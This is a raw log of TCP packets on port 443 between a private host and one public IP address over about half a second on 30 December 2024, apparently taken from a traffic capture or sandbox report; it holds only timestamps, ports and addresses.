Dec 30, 2024 19:15:09.654781103 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.654831886 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.658169031 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.658226013 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.668591976 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.668773890 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.668812037 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.668819904 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.668890953 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.679497957 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.679565907 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.679580927 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.679619074 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.685509920 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.685571909 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.691180944 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.691227913 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.694700003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.694760084 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.703128099 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.703176022 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.704119921 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.704183102 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.711977959 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.712028980 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.713946104 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.714001894 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.719108105 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.719152927 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.728070021 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.728121996 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.728192091 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.728213072 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.728235960 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.728246927 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.728286982 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.732574940 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.732636929 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.735140085 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.735199928 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.737597942 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.737639904 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.740685940 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.740737915 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.743587017 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.743643045 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.746376991 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.746438980 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.749001026 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.749046087 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.751835108 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.751890898 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.755150080 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.755223036 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.757428885 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.757477999 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.762944937 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.763014078 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.763020039 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.763065100 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.770456076 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.770519972 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.771137953 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.771188974 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.775806904 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.775857925 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.777757883 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.777992964 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.778040886 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.778044939 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.778096914 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.783004045 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.783061028 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.783371925 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.783421040 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.786701918 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.786763906 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.794177055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.794231892 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.794235945 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.794382095 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.794902086 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.794944048 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.801595926 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.801604986 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.801656008 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.807516098 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.807573080 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.810627937 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.810663939 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.810683012 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.810688019 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.810731888 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.813489914 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.813559055 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.820450068 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.820517063 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.821862936 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.821914911 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.823846102 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.823895931 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.828201056 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.828264952 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.829360962 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.829406977 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.830687046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.830729008 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.833357096 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.833420038 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.836947918 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.837008953 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.838378906 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.838427067 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.840761900 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.840821028 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.841931105 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.841975927 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.844304085 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.844348907 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.847121954 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.847142935 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.847172022 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.847177982 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.847193956 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.848510027 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.848557949 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.848562002 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.850006104 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.850049019 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.850053072 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.852840900 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.852896929 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.852900982 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.854175091 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.854221106 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.854224920 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.855501890 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.855551958 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.855557919 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.856853008 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.856897116 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.856901884 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.857925892 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.857966900 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.857971907 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.859321117 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.859363079 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.859370947 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.860464096 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.860513926 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.860522032 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.861892939 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.861947060 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.861952066 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.862880945 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.862931013 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.862936974 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.864784956 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.864836931 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.864841938 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.864882946 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.866131067 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.866179943 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.867141962 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.867182970 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.868460894 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.868511915 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.869811058 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.869860888 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.882652044 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.882698059 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.882744074 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.882749081 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.882756948 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.882791042 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.899348974 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.899369955 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.899408102 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.899414062 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.899450064 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.909257889 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.909291983 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.909316063 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.909322023 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.909352064 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.909375906 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.912714958 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.912775040 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.917983055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.918037891 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.929415941 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.929430962 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.929475069 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.929481030 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.929518938 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.937103033 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.937118053 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.937154055 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.937160015 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.937186003 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.937208891 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.937359095 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.937412024 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.941621065 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.941673040 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.945419073 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.945468903 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.945606947 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.945636034 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.945651054 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.945655107 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.945682049 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.945698977 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.953526020 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.953563929 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.953583002 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.953587055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.953612089 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.956868887 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.956906080 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.956908941 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.956918001 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.956948042 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.965025902 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.965084076 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.965089083 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.965126038 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.977420092 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.977475882 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.977487087 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.977494955 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.977526903 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.978440046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.978482008 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.978483915 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.978493929 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.978518963 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.978801966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.978859901 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.978864908 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.987762928 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.987930059 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.987973928 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.987982035 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.987987995 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.988017082 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.997718096 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.997750998 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.997757912 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.997761965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.997780085 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:09.997781992 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.997838020 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:09.997843027 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.000966072 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.001023054 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.001028061 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.001036882 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.001070976 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.006469965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.006522894 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.006727934 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.006752968 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.006767035 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.006771088 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.006793022 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.013948917 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.013988018 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.013993025 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.017939091 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.017963886 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.017977953 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.017982960 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.018012047 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.021358967 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.021403074 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.021518946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.021554947 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.021753073 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.021789074 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.025572062 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.025616884 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.025667906 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.025701046 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.026120901 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.026164055 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.029926062 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.029963017 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.030067921 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.030113935 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.033988953 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.034024000 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.034039021 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.034043074 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.034085989 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.041951895 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.041968107 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.042000055 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.042005062 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.042031050 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.042045116 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.053529024 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.053543091 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.053584099 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.053592920 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.053819895 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.067033052 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.067048073 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.067084074 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.067090988 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.067128897 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.086508989 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.086524010 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.086559057 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.086565018 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.086605072 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.095009089 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.095021009 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.095052958 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.095057964 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.095088959 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.106357098 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.106372118 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.106401920 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.106405973 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.106435061 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.114408016 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.114422083 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.114456892 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.114460945 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.114490986 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.122723103 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.122737885 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.122777939 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.122782946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.122822046 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.130460978 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.130471945 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:10.130508900 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:10.130513906 CET	443	49709	172.67.154.95	192.168.2.5
